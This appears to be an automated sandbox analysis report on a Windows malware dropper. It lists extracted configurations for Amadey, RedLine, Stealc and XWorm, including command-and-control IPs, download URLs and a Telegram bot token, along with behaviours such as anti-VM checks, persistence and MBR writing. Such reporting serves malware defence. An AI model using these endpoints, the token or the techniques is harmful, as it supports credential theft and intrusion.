Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
19-05-2024 07:23
Behavioral task
behavioral1
Sample
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe
Resource
win10v2004-20240508-en
General
-
Target
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe
-
Size
1.8MB
-
MD5
7b9e20d04c1a48e9a02efc8185df8cde
-
SHA1
7ce417aa351cc1edcbeae023ddfb2f47f46add97
-
SHA256
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8
-
SHA512
8abda4c87c28f8f9ed58a21056b0ee567e3c08b619245a5fea998fa8763b06dd1a43d04b9ac065f2b17a0092322fafdb8ed0c2ae4281e04a825916660c94bc37
-
SSDEEP
49152:uN1sjZlmYhs1JsCky09lIZKHE5zhzblNw3wbpme:u8NsYCk4ZMqzbrwgMe
Malware Config
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/th.php?a=2836&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=458&c=1002
Extracted
https://d22hce23hy1ej9.cloudfront.net/load/dl.php?id=444&c=1002
Extracted
amadey
4.20
18befc
http://5.42.96.141
-
install_dir
908f070dff
-
install_file
explorku.exe
-
strings_key
b25a9385246248a95c600f9a061438e1
-
url_paths
/go34ko8/index.php
Extracted
amadey
4.20
c767c0
http://5.42.96.7
-
install_dir
7af68cdb52
-
install_file
axplons.exe
-
strings_key
e2ce58e78f631ed97d01fe7b70e85d5e
-
url_paths
/zamo7h/index.php
Extracted
risepro
147.45.47.126:58709
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:26260
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
xworm
127.0.0.1:7000
beshomandotestbesnd.run.place:7000
-
Install_directory
%ProgramData%
-
install_file
taskmgr.exe
-
telegram
https://api.telegram.org/bot2128988424:AAEkYnwvOQA95riqRZwlqBxg4GV-odRNOyo/sendMessage?chat_id=966649672
Extracted
redline
Vic
beshomandotestbesnd.run.place:1111
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\system.exe family_xworm behavioral1/memory/5972-739-0x0000000000B60000-0x0000000000B7A000-memory.dmp family_xworm -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral1/memory/5100-144-0x0000000000070000-0x00000000000C2000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe family_redline behavioral1/memory/60-189-0x0000000000450000-0x00000000004A2000-memory.dmp family_redline C:\ProgramData\build.exe family_redline behavioral1/memory/6068-751-0x0000000000280000-0x000000000029E000-memory.dmp family_redline -
SectopRAT payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\build.exe family_sectoprat behavioral1/memory/6068-751-0x0000000000280000-0x000000000029E000-memory.dmp family_sectoprat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
Processes:
axplons.exe7b2f91b071.exeaxplons.exeexplorku.exea66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeexplorku.exeamers.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7b2f91b071.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplons.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorku.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amers.exe -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 87 5048 powershell.exe 95 3572 powershell.exe 101 3572 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 17 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 5392 powershell.exe 4104 powershell.exe 5516 powershell.exe 5100 powershell.exe 5332 powershell.EXE 216 powershell.exe 5100 powershell.exe 2412 powershell.exe 3268 powershell.exe 1368 powershell.exe 5584 powershell.exe 4596 powershell.exe 3328 powershell.exe 5556 powershell.exe 5048 powershell.exe 3572 powershell.exe 5952 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral1/memory/5176-600-0x00000000025F0000-0x0000000002656000-memory.dmp net_reactor behavioral1/memory/5176-603-0x0000000004B50000-0x0000000004BB4000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 15 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
explorku.exeexplorku.exeInstall.exeaxplons.exeamers.exe7b2f91b071.exea66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeaxplons.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorku.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7b2f91b071.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amers.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplons.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7b2f91b071.exe -
Checks computer location settings 2 TTPs 13 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
axplons.exea66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeRegAsm.exeNewB.exeredline1.exepl.exeReurgingGleek.exesystem.exeexplorku.exeamers.exeinstall.exeInstall.exeInstall.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation axplons.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation NewB.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation redline1.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation pl.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation ReurgingGleek.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation system.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation explorku.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation amers.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation install.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 49 IoCs
Processes:
explorku.exeamers.exeaxplons.exe7b2f91b071.exealex.execrypted333.exesvhoost.exeOne.exeredline1.exeinstall.exeGameService.exeswizzzz.exeGameService.exeGameService.exeGameService.exeGameService.exeGameSyncLink.exe605861.exeexplorku.exeaxplons.exelumma1.exeNewB.exevpn-1002.exeGameService.exeGameService.exeGameService.exeGameService.exeGameService.exefile300un.exepl.exeReurgingGleek.exei0.exehYchmv7XoywAmMadCtbrbOhc.exei0.tmpsystem.exebuild.exeGameService.exeShFz0AYbnWgX4IsKjus61RWN.exeGameService.exeGameService.exeGameService.exeGameSyncLinks.exe151594.exePiercingNetLink.exeR2T5vMWDwprMlVD4QWyCIOWu.exeInstall.exeH0hAwii6pOOtrsKJ5CtraSSo.exevvqwA2BJ1ZI77xYXTbgy3RnB.exeInstall.exepid process 2384 explorku.exe 3952 amers.exe 2544 axplons.exe 3152 7b2f91b071.exe 2112 alex.exe 4912 crypted333.exe 5100 svhoost.exe 4052 One.exe 60 redline1.exe 2216 install.exe 1588 GameService.exe 4760 swizzzz.exe 3788 GameService.exe 2412 GameService.exe 3512 GameService.exe 3552 GameService.exe 4520 GameSyncLink.exe 3708 605861.exe 4860 explorku.exe 452 axplons.exe 2012 lumma1.exe 2180 NewB.exe 2508 vpn-1002.exe 4692 GameService.exe 1600 GameService.exe 1032 GameService.exe 2372 GameService.exe 4024 GameService.exe 3540 file300un.exe 4692 pl.exe 5176 ReurgingGleek.exe 5304 i0.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe 5812 i0.tmp 5972 system.exe 6068 build.exe 1220 GameService.exe 1916 ShFz0AYbnWgX4IsKjus61RWN.exe 5152 GameService.exe 3952 GameService.exe 2808 GameService.exe 5360 GameSyncLinks.exe 5720 151594.exe 1816 PiercingNetLink.exe 2708 R2T5vMWDwprMlVD4QWyCIOWu.exe 5384 Install.exe 5488 H0hAwii6pOOtrsKJ5CtraSSo.exe 3296 vvqwA2BJ1ZI77xYXTbgy3RnB.exe 5588 Install.exe -
Identifies Wine through registry keys 2 TTPs 3 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplons.exeamers.exeaxplons.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine axplons.exe Key opened \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine amers.exe Key opened \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Software\Wine axplons.exe -
Loads dropped DLL 5 IoCs
Processes:
605861.exevpn-1002.exeRegAsm.exehYchmv7XoywAmMadCtbrbOhc.exepid process 3708 605861.exe 2508 vpn-1002.exe 4832 RegAsm.exe 4832 RegAsm.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/memory/3676-0-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-1-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-2-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-3-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-5-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-6-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-4-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/3676-7-0x00000000002A0000-0x00000000007FD000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe themida behavioral1/memory/3676-20-0x00000000002A0000-0x00000000007FD000-memory.dmp themida behavioral1/memory/2384-22-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-25-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-24-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-23-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-21-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-28-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-27-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-26-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2384-61-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\1000014001\7b2f91b071.exe themida behavioral1/memory/3152-94-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-96-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-100-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-98-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-102-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-104-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-103-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-101-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/3152-97-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/2384-253-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-333-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-332-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-331-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-312-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-311-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-309-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-310-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/4860-308-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/3152-304-0x0000000000710000-0x0000000000D96000-memory.dmp themida behavioral1/memory/4860-366-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/1936-1304-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/1936-1308-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida behavioral1/memory/2380-1405-0x00000000006D0000-0x0000000000C2D000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explorku.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7b2f91b071.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000014001\\7b2f91b071.exe" explorku.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeexplorku.exe7b2f91b071.exeexplorku.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7b2f91b071.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA explorku.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
ShFz0AYbnWgX4IsKjus61RWN.exedescription ioc process File opened (read-only) \??\F: ShFz0AYbnWgX4IsKjus61RWN.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 157 checkip.amazonaws.com 158 checkip.amazonaws.com 159 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
hYchmv7XoywAmMadCtbrbOhc.exedescription ioc process File opened for modification \??\PhysicalDrive0 hYchmv7XoywAmMadCtbrbOhc.exe -
Drops file in System32 directory 1 IoCs
Processes:
i0.tmpdescription ioc process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
amers.exeaxplons.exeaxplons.exepid process 3952 amers.exe 2544 axplons.exe 452 axplons.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
alex.execrypted333.exeswizzzz.exelumma1.exefile300un.exedescription pid process target process PID 2112 set thread context of 2316 2112 alex.exe RegAsm.exe PID 4912 set thread context of 5072 4912 crypted333.exe RegAsm.exe PID 4760 set thread context of 4832 4760 swizzzz.exe RegAsm.exe PID 2012 set thread context of 3452 2012 lumma1.exe RegAsm.exe PID 3540 set thread context of 3060 3540 file300un.exe installutil.exe -
Drops file in Program Files directory 29 IoCs
Processes:
install.exei0.tmpchrome.exedescription ioc process File opened for modification C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File created C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\security.crx i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Online Security\is-PMRJF.tmp i0.tmp File created C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe install.exe File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\dlls.manifest i0.tmp File opened for modification C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File created C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe install.exe File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\scoped_dir4696_1744797947\extension.zip chrome.exe File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File opened for modification C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File created C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe install.exe File created C:\Program Files (x86)\GameSyncLink\installc.bat install.exe File created C:\Program Files (x86)\GameSyncLink\installg.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\installm.bat install.exe File opened for modification C:\Program Files (x86)\GameSyncLink\GameService.exe install.exe File created C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.manifest i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files (x86)\Microsoft\Edge\Application\Extensions\updates.xml i0.tmp -
Drops file in Windows directory 2 IoCs
Processes:
a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exeamers.exedescription ioc process File created C:\Windows\Tasks\explorku.job a66cb30c102106b9aaf93b19eda0086a4d6a4788a6678e85a2cc1e16151d1ea8.exe File created C:\Windows\Tasks\axplons.job amers.exe -
Launches sc.exe 19 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1404 sc.exe 3540 sc.exe 5544 sc.exe 832 sc.exe 620 sc.exe 4932 sc.exe 5308 sc.exe 2440 sc.exe 6136 sc.exe 5652 sc.exe 396 sc.exe 1120 sc.exe 1468 sc.exe 3736 sc.exe 6056 sc.exe 5436 sc.exe 3908 sc.exe 5824 sc.exe 5540 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4604 5176 WerFault.exe ReurgingGleek.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\pl.exe nsis_installer_1 C:\Users\Admin\AppData\Local\Temp\pl.exe nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2112 schtasks.exe 5796 schtasks.exe 1296 schtasks.exe 1664 schtasks.exe 336 schtasks.exe 4336 schtasks.exe 4532 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 5644 taskkill.exe 3628 taskkill.exe -
Processes:
svhoost.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 svhoost.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 svhoost.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 115 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 158 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 165 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 49 IoCs
Processes:
amers.exeaxplons.exeRegAsm.exeredline1.exeaxplons.exeOne.exesvhoost.exepowershell.exepowershell.exepowershell.exehYchmv7XoywAmMadCtbrbOhc.exeShFz0AYbnWgX4IsKjus61RWN.exepowershell.exepowershell.exepowershell.exepid process 3952 amers.exe 3952 amers.exe 2544 axplons.exe 2544 axplons.exe 4832 RegAsm.exe 4832 RegAsm.exe 60 redline1.exe 60 redline1.exe 452 axplons.exe 452 axplons.exe 60 redline1.exe 60 redline1.exe 4052 One.exe 4052 One.exe 4832 RegAsm.exe 4832 RegAsm.exe 5100 svhoost.exe 5100 svhoost.exe 60 redline1.exe 60 redline1.exe 5048 powershell.exe 5048 powershell.exe 5048 powershell.exe 5100 svhoost.exe 5100 svhoost.exe 5100 svhoost.exe 5100 svhoost.exe 3572 powershell.exe 3572 powershell.exe 3572 powershell.exe 5952 powershell.exe 5952 powershell.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe 5292 hYchmv7XoywAmMadCtbrbOhc.exe 5952 powershell.exe 1916 ShFz0AYbnWgX4IsKjus61RWN.exe 1916 ShFz0AYbnWgX4IsKjus61RWN.exe 1916 ShFz0AYbnWgX4IsKjus61RWN.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 5584 powershell.exe 5584 powershell.exe 5584 powershell.exe 5100 powershell.exe 5100 powershell.exe 5100 powershell.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
One.exesvhoost.exepowershell.exeredline1.exepowershell.exeinstallutil.exeReurgingGleek.exesystem.exepowershell.exehYchmv7XoywAmMadCtbrbOhc.exebuild.exeRegAsm.exe151594.exetaskkill.exepowershell.exetaskkill.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeDebugPrivilege 4052 One.exe Token: SeBackupPrivilege 4052 One.exe Token: SeSecurityPrivilege 4052 One.exe Token: SeSecurityPrivilege 4052 One.exe Token: SeSecurityPrivilege 4052 One.exe Token: SeSecurityPrivilege 4052 One.exe Token: SeDebugPrivilege 5100 svhoost.exe Token: SeDebugPrivilege 5048 powershell.exe Token: SeDebugPrivilege 60 redline1.exe Token: SeDebugPrivilege 3572 powershell.exe Token: SeDebugPrivilege 3060 installutil.exe Token: SeDebugPrivilege 5176 ReurgingGleek.exe Token: SeDebugPrivilege 5972 system.exe Token: SeDebugPrivilege 5952 powershell.exe Token: SeManageVolumePrivilege 5292 hYchmv7XoywAmMadCtbrbOhc.exe Token: SeDebugPrivilege 6068 build.exe Token: SeDebugPrivilege 2316 RegAsm.exe Token: SeLockMemoryPrivilege 5720 151594.exe Token: SeDebugPrivilege 3628 taskkill.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 5644 taskkill.exe Token: SeDebugPrivilege 5584 